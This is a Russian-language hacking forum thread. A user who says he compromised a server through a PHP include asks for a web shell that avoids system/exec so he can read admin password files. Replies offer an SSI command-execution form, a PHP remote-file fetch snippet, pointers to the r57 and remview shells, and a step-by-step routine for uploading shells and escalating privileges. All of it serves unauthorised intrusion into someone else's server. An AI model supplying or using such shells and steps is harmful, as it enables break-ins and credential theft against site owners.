![]() |
Нужен веб-шелл без использования system, passthru,exec,etc
Здравствуйте! Вчера мне довелось взяться за взлом одного сервака, нашёл там php-include, получил веб-шелл. Хочу получить пароли от админки одого сайта, пытался использовать утилиту cat для чтения php-файлов с паролями, но везде на нужных мне файлах стоят чмоды -rw-r--r-- , этот способ почему-то не проходит, при обычном обращении к таким php-файлам через браузер они исполняются интерпритатором, поэтому мне кажется, что эти файлы можно прочитать с помощью такого веб-шелла, где не используются system, passthru,exec,etc, а используются такие php-функции как chdir(), fpassthru() и т.д.
Использовать сплойт для ядра пока что не хочу, а Программировать нормально на php я пока что не умею, поэтому прошу вас подсказать мне публичные веб-шеллы такого типа, помогите, please! |
CODE
<html> <body> <script language="JavаScript"> <!-- function execute() { var cmd = document.exec.cmd.value; document.write('<html><body><!--#exec cmd="'+cmd+'"--></body></html>'); } //--> </script> <form name="exec"> <input type="text" name="cmd" size="20" value=""> <input type="submit" value="exec" onClick="execute()"> </form> </body> </html> |
Покури форум еще!! Вот на форуме давно кто-то выложил!
<?php $file=""; $tem=""; $temp=tempnam($tem, "cx"); if(copy("http://".$file, $temp)) { $otrit = fopen($temp, "r"); $pokaz = fread($otrit, filesize($temp)); fclose($otrit); echo htmlspecialchars($pokaz); unlink($temp); } ?> |
Цитата:
|
Есть , но стоит денег! Поставь хоть +! :)
Потыкай вот это еще Код:
<? |
Цитата:
|
Цитата:
|
PHP код:
Вот. Значит, будет у тебя поле, куда будешь писать PHP-код, а потом нажимать на кнопку, и он будет исполняться. =========== Вот код для просмотра текущей директории: PHP код:
А вот для файла: PHP код:
<xmp> - для того, чтоб теги не работали, а показывались напрямую: слово -> <i>слово</i> ================= Есть еще шелл, не использующий system: http://php.spb.ru/remview/ |
В 2 словах при включенном Safe-mode юзай просто r57 шелл он позволяет просмотреть директории на сервере и прочитать файлы+ используй все что я скинул и последнее.
Я обычно делаю так: 1. Заливаю r57 , потом свой самопал , затем права(если nobody), то все в шляпе можешь просмотреть все на сервере почти. |
Береги себя!!! Стучи 1-869-53два!
|
| Время: 06:44 |